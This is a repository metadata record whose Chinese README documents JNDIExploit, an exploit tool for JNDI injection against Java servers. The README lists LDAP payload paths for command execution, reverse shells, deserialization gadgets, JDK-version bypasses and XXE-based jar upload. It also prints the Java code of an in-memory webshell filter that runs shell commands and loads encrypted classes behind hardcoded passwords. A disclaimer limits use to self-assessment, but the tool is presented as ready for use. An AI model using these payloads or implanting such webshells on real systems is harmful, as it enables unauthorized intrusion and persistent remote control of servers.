{"id":18555357,"url":"https://github.com/0x727/jndiexploit","last_synced_at":"2025-10-25T09:42:23.289Z","repository":{"id":58273977,"uuid":"419953601","full_name":"0x727/JNDIExploit","owner":"0x727","description":"一款用于JNDI注入利用的工具，大量参考/引用了Rogue JNDI项目的代码，支持直接植入内存shell，并集成了常见的bypass 高版本JDK的方式，适用于与自动化工具配合使用。","archived":false,"fork":false,"pushed_at":"2022-09-06T00:43:52.000Z","size":85172,"stargazers_count":342,"open_issues_count":0,"forks_count":28,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-07-27T05:23:07.677Z","etag":null,"topics":["exp","exploit","jndi","jndiexploit"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x727.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-10-22T03:27:53.000Z","updated_at":"2025-07-14T02:34:25.000Z","dependencies_parsed_at":"2022-08-31T13:41:53.780Z","dependency_job_id":null,"html_url":"https://github.com/0x727/JNDIExploit","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/0x727/JNDIExploit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x727","download_url":"https://codeload.github.com/0x727/JNDIExploit/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x727%2FJNDIExploit/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":280936411,"owners_count":26416543,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-25T02:00:06.499Z","response_time":81,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exp","exploit","jndi","jndiexploit"],"created_at":"2024-11-06T21:26:16.528Z","updated_at":"2025-10-25T09:42:23.245Z","avatar_url":"https://github.com/0x727.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# JNDIExploit\n\n一款用于 ```JNDI注入``` 利用的工具，大量参考/引用了 ```Rogue JNDI``` 项目的代码，支持直接```植入内存shell```，并集成了常见的```bypass 高版本JDK```的方式，适用于与自动化工具配合使用。\n\n---\n\n\n\n## 免责声明\n\n该工具仅用于安全自查检测\n\n由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。\n\n本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。\n\n---\n\n\n\n## 添加内容\n\n添加内容是为了支持SpringBootExploit工具，是定制版的服务端。\n\n1. 启动方式：java -jar  JNDIExploit-1.2-SNAPSHOT.jar 默认绑定127.0.0.1 LDAP 绑定 1389 HTTP Server 绑定3456\n2. 根目录下BehinderFilter.class是内存马 /ateam 密码是ateamnb \n3. 根目录下Calc.class是弹计算器\n4. data/behinder3.jar 是为了支持SnakYaml RCE\n5. 添加HTTPServer处理更多的请求，为了更好支持SpringBootExploit工具\n6. 将文件放在data目录下，通过HTTPServer可以访问文件内容如同python的HTTPServer\n7. \n\n---\n\n## TODO\n\n1. 本地ClassPath反序列化漏洞利用方式\n2. 支持自定义内存马密码\n3. 内存马模块改一下\n\n\n\n\n\n---\n\n\n\n## 使用说明\n\n使用 ```java -jar JNDIExploit.jar -h``` 查看参数说明，其中 ```--ip``` 参数为必选参数\n\n```\nUsage: java -jar JNDIExploit.jar [options]\n  Options:\n  * -i, --ip       Local ip address\n    -l, --ldapPort Ldap bind port (default: 1389)\n    -p, --httpPort Http bind port (default: 8080)\n    -u, --usage    Show usage (default: false)\n    -h, --help     Show this help\n```\n\n使用 ```java -jar JNDIExploit.jar -u``` 查看支持的 LDAP 格式\n```\nSupported LADP Queries\n* all words are case INSENSITIVE when send to ldap server\n\n[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.\n    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]\n    ldap://127.0.0.1:1389/Basic/Command/[cmd]\n    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/Basic/TomcatEcho\n    ldap://127.0.0.1:1389/Basic/SpringEcho\n    ldap://127.0.0.1:1389/Basic/WeblogicEcho\n    ldap://127.0.0.1:1389/Basic/TomcatMemshell1\n    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]\n    ldap://127.0.0.1:1389/Basic/JettyMemshell\n    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1\n    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2\n    ldap://127.0.0.1:1389/Basic/JBossMemshell\n    ldap://127.0.0.1:1389/Basic/WebsphereMemshell\n    ldap://127.0.0.1:1389/Basic/SpringMemshell\n\n[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.\n    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]\n    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]\n    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho\n    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho\n    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho\n    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1\n    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1\n    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells\n\n[+] TomcatBypass Queries\n    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]\n    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]\n    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho\n    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1\n    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]\n    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell\n\n[+] GroovyBypass Queries\n    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]\n    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]\n\n[+] WebsphereBypass Queries\n    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported\n    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell\n    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp\n```\n* 目前支持的所有 ```PayloadType``` 为\n  * ```Dnslog```: 用于产生一个```DNS```请求，与 ```DNSLog```平台配合使用，对```Linux/Windows```进行了简单的适配\n  * ```Command```: 用于执行命令，如果命令有特殊字符，支持对命令进行 ```Base64编码```后传输\n  * ```ReverseShell```: 用于 ```Linux``` 系统的反弹shell，方便使用\n  * ```TomcatEcho```: 用于在中间件为 ```Tomcat``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令\n  * ```SpringEcho```: 用于在框架为 ```SpringMVC/SpringBoot``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令\n  * ```WeblogicEcho```: 用于在中间件为 ```Weblogic``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令\n  * ```TomcatMemshell1```: 用于植入```Tomcat内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n  * ```TomcatMemshell2```: 用于植入```Tomcat内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```, 使用时需要添加额外的```HTTP Header``` ```Shell: true```, **推荐**使用此方式\n  * ```SpringMemshell```: 用于植入```Spring内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n  * ```WeblogicMemshell1```: 用于植入```Weblogic内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n  * ```WeblogicMemshell2```: 用于植入```Weblogic内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```，**推荐**使用此方式\n  * ```JettyMemshell```: 用于植入```Jetty内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n  * ```JBossMemshell```: 用于植入```JBoss内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n  * ```WebsphereMemshell```: 用于植入```Websphere内存shell```， 支持```Behinder shell``` 与 ```Basic cmd shell```\n* 目前支持的所有 ```GadgetType``` 为\n  * ```URLDNS```\n  * ```CommonsBeanutils1```  \n  * ```CommonsBeanutils2```\n  * ```CommonsCollectionsK1```\n  * ```CommonsCollectionsK2```\n  * ```C3P0```\n  * ```Jdk7u21```\n  * ```Jre8u20```\n  * ```CVE_2020_2551```\n  * ```CVE_2020_2883```\n* ```WebsphereBypass``` 中的 3 个动作：\n  * ```list```：基于```XXE```查看目标服务器上的目录或文件内容\n  * ```upload```：基于```XXE```的```jar协议```将恶意```jar包```上传至目标服务器的临时目录\n  * ```rce```：加载已上传至目标服务器临时目录的```jar包```，从而达到远程代码执行的效果（这一步本地未复现成功，抛```java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.```异常，有复现成功的小伙伴麻烦指导下）\n\n## ```内存shell```说明\n* 采用动态添加 ```Filter/Controller```的方式，并将添加的```Filter```移动至```FilterChain```的第一位\n* ```内存shell``` 的兼容性测试结果请参考 [memshell](https://github.com/feihong-cs/memShell) 项目\n* ```Basic cmd shell``` 的访问方式为 ```/anything?type=basic\u0026pass=[cmd]```\n* ```Behinder shell``` 的访问方式需要修改```冰蝎```客户端（请参考 [冰蝎改造之适配基于tomcat Filter的无文件webshell](https://mp.weixin.qq.com/s/n1wrjep4FVtBkOxLouAYfQ) 的方式二自行修改），并在访问时需要添加 ```X-Options-Ai``` 头部，密码为```rebeyond```\n\n植入的 Filter 代码如下：\n```\npublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {\n        System.out.println(\"[+] Dynamic Filter says hello\");\n        String k;\n        Cipher cipher;\n        if (servletRequest.getParameter(\"type\") != null \u0026\u0026 servletRequest.getParameter(\"type\").equals(\"basic\")) {\n            k = servletRequest.getParameter(\"pass\");\n            if (k != null \u0026\u0026 !k.isEmpty()) {\n                cipher = null;\n                String[] cmds;\n                if (File.separator.equals(\"/\")) {\n                    cmds = new String[]{\"/bin/sh\", \"-c\", k};\n                } else {\n                    cmds = new String[]{\"cmd\", \"/C\", k};\n                }\n\n                String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter(\"\\\\A\").next();\n                servletResponse.getWriter().println(result);\n            }\n        } else if (((HttpServletRequest)servletRequest).getHeader(\"X-Options-Ai\") != null) {\n            try {\n                if (((HttpServletRequest)servletRequest).getMethod().equals(\"POST\")) {\n                    k = \"e45e329feb5d925b\";\n                    ((HttpServletRequest)servletRequest).getSession().setAttribute(\"u\", k);\n                    cipher = Cipher.getInstance(\"AES\");\n                    cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute(\"u\") + \"\").getBytes(), \"AES\"));\n                    byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));\n                    Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod(\"defineClass\", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());\n                    Object evilObject = evilClass.newInstance();\n                    Method targetMethod = evilClass.getDeclaredMethod(\"equals\", ServletRequest.class, ServletResponse.class);\n                    targetMethod.invoke(evilObject, servletRequest, servletResponse);\n                }\n            } catch (Exception var10) {\n                var10.printStackTrace();\n            }\n        } else {\n            filterChain.doFilter(servletRequest, servletResponse);\n        }\n\n    }\n```\n\n ## 参考\n * https://github.com/veracode-research/rogue-jndi\n * https://github.com/welk1n/JNDI-Injection-Exploit\n * https://github.com/welk1n/JNDI-Injection-Bypass\n\n\n\n![as](https://starchart.cc/0x727/JNDIExploit.svg)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x727%2Fjndiexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x727%2Fjndiexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x727%2Fjndiexploit/lists"}